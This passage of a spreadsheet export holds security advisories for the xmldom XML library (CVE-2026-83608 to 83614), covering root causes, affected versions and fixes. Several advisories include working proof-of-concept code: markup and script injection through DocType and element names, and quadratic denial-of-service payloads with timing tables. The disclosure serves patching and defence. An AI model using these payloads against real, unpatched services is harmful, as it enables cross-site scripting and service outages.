`publicId`/`systemId`/`internalSubset` checks. Non-breaking and opt-in; ships on both maintained versions. No
creation-time change is made: 0.9.x already validates the name at `createDocumentType`, and the
0.8.x/unscoped creation gap cannot be closed without a breaking change, so it is left
unfixed.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dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

// Default path: the ill-formed name is still emitted verbatim (injection present).
console.log(serializer.serializeToString(doc));
// &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;

// Opt-in path: serialization throws instead of emitting the breakout.
serializer.serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser
`XMLSerializer` emits the name verbatim in that default mode. Unconditionally
throwing would be an unjustified breaking change against that specified default,
so the guard is opt-in behind `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path still emits the ill-formed DocType `name`
verbatim; protection applies only when `requireWellFormed: true` is passed. No
creation-time validation is added for the DocType `name`: 0.9.x already validates
at `createDocumentType`, and the 0.8.x/unscoped creation gap is left unfixed — it
cannot be closed without a breaking change.</t></is></c><c r="T51" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t></is></c></row><row r="52"><c r="A52" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B52" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C52" s="5" t="inlineStr"><is><t>CVE-2026-83609</t></is></c><c r="D52" s="5" t="inlineStr" /><c r="E52" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F52" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G52" s="5" t="inlineStr" /><c r="H52" s="5" t="n"><v>0.003</v></c><c r="I52" s="5" t="inlineStr" /><c r="J52" s="5" t="inlineStr" /><c r="K52" s="5" t="inlineStr" /><c r="L52" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M52" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N52" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q52" s="5" t="inlineStr" /><c r="R52" s="5" t="inlineStr" /><c r="S52" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses xmldom's always-on, WHATWG-mandated creation-time name
validation. `createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` should
reject a malformed qualified name with `InvalidCharacterError`, but a name whose first line is
well-formed slips through and enters the DOM. On serialization it is emitted verbatim, so the
characters after the line terminator inject markup into the output. The injection reaches the default
serialization path, and enabling `requireWellFormed` does not prevent it.

## Details

`createElementNS`, `createAttributeNS`, and `createDocumentType` route through `validateQualifiedName`,
and `createAttribute` performs the analogous check; each validates the name with
`g.QName_exact.test(name)`. `QName_exact = reg('^', QName, '$')` inherits the `m` flag from xmldom's
shared regexp builder, so the matcher accepts any name whose first line is a valid `QName` and leaves
the remaining lines unconstrained (see Root Cause).

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. `validateQualifiedName` / `createAttribute` validate with `.test()` against such a production, so a
   line terminator followed by breakout markup passes and the malformed name is stored.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

const doc = impl.createDocument('urn:x', 'root', null);
const el = doc.createElementNS('urn:x', 'a\n&gt;&lt;script&gt;x&lt;/script');  // ACCEPTED (no throw)
doc.documentElement.appendChild(el);

// DEFAULT serialization — requireWellFormed NOT set:
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;root xmlns="urn:x"&gt;&lt;a
// &gt;&lt;script&gt;x&lt;/script/&gt;&lt;/root&gt;          &lt;-- injected element on the default path
// Control: createElementNS('urn:x', 'bad&gt;name') throws InvalidCharacterError, confirming the check is
// active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the always-on WHATWG creation-time name validation** (`InvalidCharacterError`): a
  malformed name the standard requires be rejected at creation is instead admitted to the DOM.
- **Markup / structure injection.** An application relying on the `create*` APIs to reject malformed
  names (the standard behavior) as a trust boundary is exposed; where the serialized output reaches an
  HTML context, downstream XSS.
- **No serializer option mitigates it.** The admitted name is emitted verbatim under *both* the default
  path and `requireWellFormed: true` — the strict serializer shares the same `m`-flagged blind spot
  (the subject of the sibling serializer advisories) — so the bypassed creation-time check was the only
  layer that could have stopped it. Demonstrated for all four `create*` sites in
  `poc_creation_strict_serialization_bypass.cjs`.

## Fix Applied

`createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` now reject a name
containing a line terminator with `InvalidCharacterError` — the same result they already give for
other malformed names — because name validation now applies to the whole string. The
`requireWellFormed` serializer's name checks are corrected by the same change. The fix is
non-breaking: such a name was already invalid, and no previously-accepted well-formed name is affected.</t></is></c><c r="T52" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t></is></c></row><row r="53"><c r="A53" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B53" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C53" s="5" t="inlineStr"><is><t>CVE-2026-83611</t></is></c><c r="D53" s="5" t="inlineStr" /><c r="E53" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F53" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G53" s="5" t="inlineStr" /><c r="H53" s="5" t="n"><v>0.004</v></c><c r="I53" s="5" t="inlineStr" /><c r="J53" s="5" t="inlineStr" /><c r="K53" s="5" t="inlineStr" /><c r="L53" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M53" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N53" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O53" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P53" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q53" s="5" t="inlineStr" /><c r="R53" s="5" t="inlineStr" /><c r="S53" s="5" t="inlineStr"><is><t>## Summary

xmldom's parser silently accepts a **not-well-formed end tag** whose valid name is followed by
trailing content — e.g. `&lt;/a⏎junk&gt;`. The element is closed, the trailing content is discarded, and no
error is reported, even though the XML end-tag production allows only optional whitespace after the
name and both Chromium and Firefox reject such input as `application/xml`. An application that relies
on xmldom to reject not-well-formed input therefore receives a false "valid" result for a document the
specification and browsers consider malformed.

## Details

Across every affected version, an end tag whose valid `Name` is followed by trailing content before
`&gt;` is silently accepted: the element is closed, the residue is dropped, and no error is reported. How
much leaks differs by line (see Affected Versions), but the observable weakness is the same.

On the current (`0.9.x`) line, the parser validates the end-tag name against the XML `ETag` production
with an anchored regular expression (`^ QName S? $`). That expression is compiled with the `m`
(multiline) flag by a shared builder, so `$` matches at an interior line terminator: a valid name on
the first line satisfies the anchored production and any content after the line break escapes the
check. On 0.9.x the whitespace-separated variant (`&lt;/a junk&gt;`) is already rejected; only the
line-terminator variant leaks. Older lines have no anchored end-tag validator at all, so they accept
both the line-terminator and the whitespace variant.

This is **not** content injection — the trailing content is dropped, and the resulting DOM is a normal
single-root document (`&lt;a/&gt;`). The security-relevant property is the silent acceptance of
not-well-formed input: xmldom's parse result disagrees with the specification and with browser XML
parsers, so any control that treats "xmldom parsed it without error" as "well-formed" is bypassed.

### Root Cause

On the `0.9.x` line, where the line-terminator variant specifically leaks:

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. The anchored end-tag production `^ QName S? $` is therefore satisfied by the first line alone, so
   trailing content after a line terminator is neither matched nor rejected — the malformed end tag is
   accepted and the residue silently discarded.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
U+2028 and U+2029 are not XML whitespace, so they are non-conforming trailing content that nonetheless
leaks because the JavaScript `$` anchor treats them as line boundaries under `m`.

## Affected Versions

Both maintained versions are affected and fixed:

- **`0.9.x`** (`&gt;= 0.9.0, &lt;= 0.9.11`) → **`0.9.12`**: the anchored end-tag validator's `m` flag leaks
  the line-terminator variant. The whitespace variant (`&lt;/a junk&gt;`) is already rejected on this line.
- **`0.8.x`** (`&gt;= 0.8.0, &lt;= 0.8.14`) → **`0.8.15`**: no anchored end-tag validator at all — both the
  line-terminator and the whitespace variant are silently accepted; the fix adds a residue check.

`release-0.7.x` (`&lt;= 0.7.13`) and the unscoped `xmldom` package (range `*`, last release 0.6.0) are
**affected but will not be patched** — they are end-of-life / unmaintained. They share the older-line
behavior (both variants silently accepted, residue dropped).

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMParser().parseFromString('&lt;a&gt;&lt;/a\njunk&gt;', 'text/xml'); // no error
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;a/&gt;   — the malformed end tag is accepted, "junk" silently discarded, no error reported.
// Expected (per XML spec / Chromium / Firefox): a parse error — the input is not well-formed.
```

## Impact

- **Silent acceptance of not-well-formed XML**: a document the specification and browser XML parsers
  reject is parsed without error.
- **Bypass of a well-formedness / parse-before-trust gate**: an application relying on xmldom to
  reject malformed input treats such a document as valid. Note this is an input-validation /
  parser-differential issue, not content injection — the trailing content is discarded.

## Fix Applied

The parser now reports a not-well-formed end tag whose valid name is followed by trailing content, on both `0.9.12` and `0.8.15` — previously it was accepted silently — and parsing recovers to the byte-identical DOM as before.\
On `0.9.12` the anchored end-tag validator is corrected so a line break followed by trailing content no longer satisfies it, reported as a recoverable `error` when parsing as XML and a `warning` when parsing as HTML.\
On `0.8.15`, which previously performed no end-tag residue validation, an equivalent residue check is added, reported as a recoverable `error` in both XML and HTML.\
Well-formed documents are unaffected.

Because the report is recoverable, the fix is non-breaking: no previously-parsed document begins to
throw and no serialized output changes. Consumers that want strict rejection can escalate the reported
`error` to a fatal one via the parser's error handler (`onError` in `0.9.12`, `errorHandler` in
`0.8.15`). The two versions also differ in the whitespace-separated variant (`&lt;/a junk&gt;`): `0.9.12`
already rejected it with a fatal error in XML and continues to, while `0.8.15` — which validated
neither variant — now emits the same recoverable report for both the whitespace and line-break
variants.

### Residual limitation

By default the parser still **recovers** (it does not reject the document); the reported condition is a
recoverable `error`/`warning`, not a fatal error, to avoid changing the parsed output in a patch
release. Converting this and the other not-well-formed-acceptance cases to a consistent `fatalError` —
including the broader end-tag leniency on the older versions — is deferred to the next breaking release,
tracked at [xmldom/xmldom#1074](https://github.com/xmldom/xmldom/issues/1074).</t></is></c><c r="T53" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t></is></c></row><row r="54"><c r="A54" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B54" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C54" s="5" t="inlineStr"><is><t>CVE-2026-83612</t></is></c><c r="D54" s="5" t="inlineStr" /><c r="E54" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F54" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G54" s="5" t="inlineStr" /><c r="H54" s="5" t="n"><v>0.003</v></c><c r="I54" s="5" t="inlineStr" /><c r="J54" s="5" t="inlineStr" /><c r="K54" s="5" t="inlineStr" /><c r="L54" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M54" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N54" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O54" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P54" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q54" s="5" t="inlineStr" /><c r="R54" s="5" t="inlineStr" /><c r="S54" s="5" t="inlineStr"><is><t>## Summary

In HTML mode (`text/html`), a raw-text element (`script`, `style`, `textarea`, `title`) whose closing
tag differs in case from its opening tag (e.g. `&lt;/ScRiPt&gt;` for `&lt;script&gt;`) is mishandled by the
parser, producing quadratic (O(n²)) output growth — a small crafted document parses and serializes
into output orders of magnitude larger, exhausting CPU and memory. A modest input of tens of KB can
therefore cause a denial of service in any service that parses untrusted HTML with xmldom. Only HTML
mode is affected.

## Details

The parser calls `parseHtmlSpecialContent` for each raw-text element in HTML mode, matched via
`isHTMLRawTextElement` / `isHTMLEscapableRawTextElement` (so all four types — `script`, `style`,
`textarea`, `title` — are in scope). It searches for the element's closing tag with
`source.indexOf('&lt;/' + tagName + '&gt;', elStartEnd)`, a byte-for-byte case-sensitive match. A
mixed-case closing tag never matches, so the search returns `-1`, and the following
`source.substring(elStartEnd + 1, -1)` extracts text backwards from the start of the document
instead of the element's content. The function then returns `-1` to the parse loop, which cannot
advance normally and falls back to character-by-character reprocessing. Every raw-text element
re-captures all source text preceding it, so output grows as O(n²) in the number of such elements.

### Root Cause

1. **Case-sensitive close-tag search** (`lib/sax.js:549`): `source.indexOf('&lt;/' + tagName + '&gt;',
   elStartEnd)` does not fold case, contrary to the WHATWG HTML RAWTEXT end-tag-name rule.
2. **Unguarded `-1`** (`lib/sax.js:550`): `source.substring(elStartEnd + 1, elEndStart)` runs even
   when `elEndStart === -1`, extracting text backwards from position 0.
3. **Unstable progression** (`lib/sax.js:556`): the function returns `elEndStart` (`-1`), driving
   repeated character-by-character fallback in the parse loop.

## Affected Versions

Only the `0.9.x` line is affected — the amplification was introduced in `0.9.0-beta.1` when
`parseHtmlSpecialContent` was refactored, and remains through `0.9.11`. The `0.8.x` line is **not**
affected: its older `parseHtmlSpecialContent` does not amplify, despite sharing the same
case-sensitive `indexOf`.

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const n = 1000;
const payload = '&lt;html&gt;&lt;body&gt;' + '&lt;script&gt;x&lt;/ScRiPt&gt;'.repeat(n) + '&lt;/body&gt;&lt;/html&gt;';
const doc = new DOMParser().parseFromString(payload, 'text/html');
const out = new XMLSerializer().serializeToString(doc);
console.log(payload.length, out.length, (out.length / payload.length).toFixed(1) + 'x');
// 18026 9037063 501.3x  — an 18 KB input yields ~9 MB of output
```

Output size grows quadratically with the number of case-mismatched raw-text elements:

```
Repeats | Input len | Output len | Ratio
1       | 44        | 109        | 2.5x
100     | 1826      | 93763      | 51.3x
500     | 9026      | 2268563    | 251.3x
1000    | 18026     | 9037063    | 501.3x
2000    | 36026     | 36074063   | 1001.3x
```

Proof of Concept from @KarimTantawey (tested with `script`); the same amplification occurs for `style`,
`textarea`, and `title`.

## Impact

Small attacker payloads can force disproportionate CPU and memory usage in services that
parse and serialize untrusted HTML via xmldom. The quadratic growth means a modest-sized input
(tens of kilobytes) can produce output in the tens or hundreds of megabytes, potentially
exhausting memory or causing timeouts.

The attack only requires HTML mode (`text/html` MIME type) and mixed-case closing tags for
any of the four raw-text element types. No special configuration or error handler setup is needed.

## Severity note

The CVSS 4.0 vector scores availability only (`VA:H`, with `VC:N/VI:N`): the flaw neither discloses
nor corrupts data, but a small untrusted HTML input (tens of KB) can force output and memory in the
tens to hundreds of MB, enough to exhaust a service's heap or stall its event loop. It is reachable
with no authentication, configuration, or error-handler setup — only that the application parses
untrusted `text/html` and serializes the result.

## Fix Applied

The raw-text closing tag is now matched case-insensitively in HTML raw-text mode (per the WHATWG HTML
[RAWTEXT end-tag rule](https://html.spec.whatwg.org/multipage/parsing.html#rawtext-end-tag-name-state)),
and a missing closing tag is handled explicitly, removing the quadratic output amplification. Output
for well-formed input is unchanged. Non-breaking; 0.9.x-only.</t></is></c><c r="T54" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t></is></c></row><row r="55"><c r="A55" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B55" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C55" s="5" t="inlineStr"><is><t>CVE-2026-83613</t></is></c><c r="D55" s="5" t="inlineStr" /><c r="E55" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F55" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G55" s="5" t="inlineStr" /><c r="H55" s="5" t="n"><v>0.003</v></c><c r="I55" s="5" t="inlineStr" /><c r="J55" s="5" t="inlineStr" /><c r="K55" s="5" t="inlineStr" /><c r="L55" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M55" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N55" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O55" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P55" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q55" s="5" t="inlineStr" /><c r="R55" s="5" t="inlineStr" /><c r="S55" s="5" t="inlineStr"><is><t>## Summary

xmldom builds the attribute collection of every parsed element by inserting attributes one at a
time into a DOM `NamedNodeMap`. Each insertion first performs a **linear scan of all
already-inserted attributes** to enforce the DOM uniqueness rule (no two attributes with the same
qualified name / namespace+local-name). Parsing an element that carries `M` distinct attributes
therefore costs `1 + 2 + … + M = O(M²)` comparisons.

Because the trigger is simply "one element with many attributes", the attack payload is a
**fully well-formed XML document**. No malformed markup, no error recovery, and no non-default
parser options are involved — parsing completes silently with zero `warning`/`error`/`fatalError`
events. An attacker who can submit a modest, highly compressible document (a single element with
tens of thousands of attributes, ~340 KB uncompressed) can consume seconds of single-threaded CPU
per request, enabling an unauthenticated denial of service.

This is distinct from the known quadratic-**memory** namespace-map issue: it burns **CPU** and it
does not require any namespace declarations or nesting.

## Details

The DOM content handler adds each attribute of a starting element by calling
`el.setAttributeNode(attr)` in a loop:

```js
// DOMHandler.startElement
for (var i = 0; i &lt; len; i++) {
	var namespaceURI = attrs.getURI(i);
	var value = attrs.getValue(i);
	var qName = attrs.getQName(i);
	var attr = doc.createAttributeNS(namespaceURI, qName);
	attr.value = attr.nodeValue = value;
	el.setAttributeNode(attr);          // O(existing attrs) each — see below
}
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L370-L387

`setAttributeNode` delegates to `NamedNodeMap.setNamedItem`, which calls `getNamedItemNS` to look
for an existing attribute with the same namespace URI and local name before appending:

```js
setNamedItem: function (attr) {
	var el = attr.ownerElement;
	if (el &amp;&amp; el !== this._ownerElement) {
		throw new DOMException(DOMException.INUSE_ATTRIBUTE_ERR);
	}
	var oldAttr = this.getNamedItemNS(attr.namespaceURI, attr.localName);  // linear scan
	if (oldAttr === attr) {
		return attr;
	}
	_addNamedNode(this._ownerElement, this, attr, oldAttr);
	return oldAttr;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L612-L623

`getNamedItemNS` walks the whole list on every call:

```js
getNamedItemNS: function (namespaceURI, localName) {
	if (!namespaceURI) {
		namespaceURI = null;
	}
	var i = 0;
	while (i &lt; this.length) {
		var node = this[i];
		if (node.localName === localName &amp;&amp; node.namespaceURI === namespaceURI) {
			return node;
		}
		i++;
	}
	return null;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L702-L715

For the i-th attribute the scan visits `i-1` entries, so inserting `M` distinct attributes performs
`Θ(M²)` comparisons. There is no hash index or set keyed by name; the map is a plain
array-backed structure.

The same structure exists on 0.8.x. There `setNamedItem` dedups via
`getNamedItem(attr.nodeName)` instead of `getNamedItemNS`, but that method is likewise a full linear
scan, so the complexity is identical:

- `startElement` loop / `setAttributeNode`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L159-L176
- `setNamedItem` → linear `getNamedItem`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L286-L308

The linear-scan `NamedNodeMap` predates the `@xmldom/xmldom` fork and is present unchanged in the
unscoped `xmldom` package back to its earliest published release. In `xmldom@0.1.0`, parsing already
inserts each attribute one at a time (`DOMHandler.startElement` loops calling
`setAttributeNS` → `setAttributeNode` → `NamedNodeMap.setNamedItem`), and `setNamedItem` dedups by
calling `getNamedItemNS`, which is a full linear `while (i--)` scan of the already-inserted
attributes — the identical `O(M²)` structure. The whole unscoped line (`0.1.0` … `0.6.0`) is
therefore affected; the earliest published tag (`0.1.0`) was verified to contain the per-insert
linear dedup scan.

## Proof of Concept

A single well-formed element with `M` distinct attributes. No malformed markup and no options:

```js
'use strict';
var DOMParser = require('@xmldom/xmldom').DOMParser;

function buildDoc(m) {
	var parts = new Array(m);
	for (var i = 0; i &lt; m; i++) parts[i] = 'a' + i + '="x"';
	return '&lt;r ' + parts.join(' ') + '/&gt;';   // &lt;r a0="x" a1="x" ... a{M-1}="x"/&gt;
}

for (var _i = 0, sizes = [2000, 4000, 8000, 16000, 32000]; _i &lt; sizes.length; _i++) {
	var m = sizes[_i];
	var xml = buildDoc(m);
	var t0 = process.hrtime.bigint();
	var doc = new DOMParser().parseFromString(xml, 'text/xml');  // silent: no error events
	var ms = Number(process.hrtime.bigint() - t0) / 1e6;
	console.log(m + ' attrs, ' + xml.length + ' bytes -&gt; ' + ms.toFixed(1) + ' ms; parsed=' +
		doc.documentElement.attributes.length);
}
```

Measured with Node.js v18.20.8 (wall-clock; absolute numbers vary by host, the **scaling** is the
load-bearing fact):

**`@xmldom/xmldom` 0.9.10:**

| M (attributes) | input bytes | time (ms) | ratio vs prev |
|---:|---:|---:|---:|
| 2000  | 18,894  | 13.4   | —     |
| 4000  | 38,894  | 38.7   | ×2.9  |
| 8000  | 78,894  | 100.8  | ×2.6  |
| 16000 | 164,894 | 406.2  | ×4.0  |
| 32000 | 340,894 | 2149.5 | ×5.3  |

**`@xmldom/xmldom` 0.8.13:**

| M (attributes) | input bytes | time (ms) |
|---:|---:|---:|
| 2000  | 18,894  | 10.6   |
| 4000  | 38,894  | 19.9   |
| 8000  | 78,894  | 75.9   |
| 16000 | 164,894 | 657.7  |
| 32000 | 340,894 | 1643.2 |

**`xmldom` (unscoped) 0.6.0:** 4000 → 28.2 ms, 8000 → 131.8 ms, 16000 → 545.2 ms (≈ ×4 per doubling).

Time grows ≈ ×4 per doubling of `M` — quadratic. About **340 KB of well-formed input costs ~1.6–2.1 s
of single-threaded CPU**, and it keeps scaling: doubling the attribute count quadruples the cost.
The document is trivially generated and compresses to a few kilobytes on the wire.

## Impact

Unauthenticated, remotely triggerable denial of service against any service that parses
attacker-influenced XML/HTML with xmldom. A single request holds one event-loop thread for seconds;
a handful of concurrent requests can saturate CPU and stall the process. Because the payload is a
plain well-formed document (one element, many attributes), it passes any "must be well-formed" gate
and reaches the parser before any application-level validation (e.g. schema checks or signature
verification) can run. The payload is highly compressible, so it is effective over compressed
transports.

## Fix Applied

Replaced the per-insert linear duplicate scan on the parse-time dedup path with a name-keyed
index, so de-duplicating an element's attributes during parse is O(M) instead of O(M²) — a
well-formed-but-hostile attribute list can no longer wedge the parse. Behavior-preserving: attribute
order and duplicate resolution (last value wins, first position kept) are byte-identical. Non-breaking
and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T55" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t></is></c></row><row r="56"><c r="A56" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B56" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C56" s="5" t="inlineStr"><is><t>CVE-2026-83614</t></is></c><c r="D56" s="5" t="inlineStr" /><c r="E56" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F56" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G56" s="5" t="inlineStr" /><c r="H56" s="5" t="n"><v>0.004</v></c><c r="I56" s="5" t="inlineStr" /><c r="J56" s="5" t="inlineStr" /><c r="K56" s="5" t="inlineStr" /><c r="L56" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M56" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N56" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q56" s="5" t="inlineStr" /><c r="R56" s="5" t="inlineStr" /><c r="S56" s="5" t="inlineStr"><is><t>## Summary

`xmldom`'s malformed-input **error-recovery path** has two quadratic-time (O(n²)) behaviors that a
single crafted input triggers together, so a tiny, highly compressible document (tens of KB) stalls
the Node.js event loop for multiple seconds. It is reachable from `DOMParser.parseFromString` under
**default options** — i.e. from unauthenticated, network-delivered XML — making this an unauthenticated
denial of service. One of the two behaviors, the `normalize()` adjacent-text merge, is **additionally
reachable programmatically** — via a plain `normalize()` call on a DOM built with adjacent text nodes,
independent of the parser — so its fix must live in `normalize()`, not only in a parser bound.

## Details

### Finding A — `parseElementStartPart` quadratic re-scan

A `&lt;` character is not a delimiter in any tag-parsing state, so `parseElementStartPart` scans
forward character-by-character over any embedded `&lt;` until it reaches the next `&gt;` (or end of
input), then validates the accumulated slice as a tag name and throws `invalid tagName:` on failure.
The main loop catches this, reports an `error`, sets `end = -1`, and recovers by advancing a single
character (`appendText(Math.max(tagStart, start) + 1)`). With a long run of `&lt;` and a distant `&gt;`,
each of the O(n) recovery retries performs an O(n) scan plus an O(n) anchored regex validation over
the growing candidate ⇒ **O(n²)**.

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `parseElementStartPart` character scan — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L263-L461
- tag-name validation (`setTagName` → throws `invalid tagName`) — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L886-L891
- main-loop `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L234-L242
- single-character recovery fallback — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L247

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `parseElementStartPart` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L227
- `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L202-L208
- recovery fallback — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L213
- `setTagName` validation — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L616-L621

### Finding B — `normalize()` adjacent-text O(K²) merge

`endDocument()` calls `document.normalize()`. For a parent with K adjacent text nodes (produced by
the one-character recovery of Finding A), `normalize()` performs K−1 merges. Each merge does a
`removeChild` — which re-indexes **all** child nodes of the parent (O(K)) — and an `appendData` —
which rebuilds the accumulator string `this.data + text` (O(K)). Total: **O(K²)**.

Well-formed XML cannot produce adjacent text-node siblings *through the parser* (each text run is one
node; comments, CDATA, PIs, and elements sit between runs), so the **parse-path** trigger for Finding B
is the malformed-input recovery that emits single-character text nodes. The same O(K²) merge is,
however, independently reachable via the public `normalize()` API on a programmatically built tree
(see "Finding B is additionally reachable programmatically" below).

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L418-L420
- `normalize()` adjacent-text merge — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1336-L1356
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1788-L1798
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L2786-L2790

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L213-L214
- `normalize()` merge — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L529-L549
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L756-L773
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1533

### Finding B is additionally reachable programmatically (no parser involved)

`Node.prototype.normalize()` is public API on every `Document`/`Element`. A tree built entirely through
the ordinary DOM API — `new DOMImplementation().createDocument(...)`, then K× `createTextNode` +
`appendChild` on one parent — reaches the **same** O(K²) merge when the application calls `normalize()`,
with **no** parsing and **no** error-recovery. The parser is only *one* of the two callers of the
vulnerable merge:

- the parser's automatic `endDocument()` → `document.normalize()` (the parse-path trigger above), and
- any explicit application call to the public `normalize()` on a tree with adjacent text nodes.

`XMLSerializer` does **not** call `normalize()`, so serializing an un-merged tree is O(total text), not
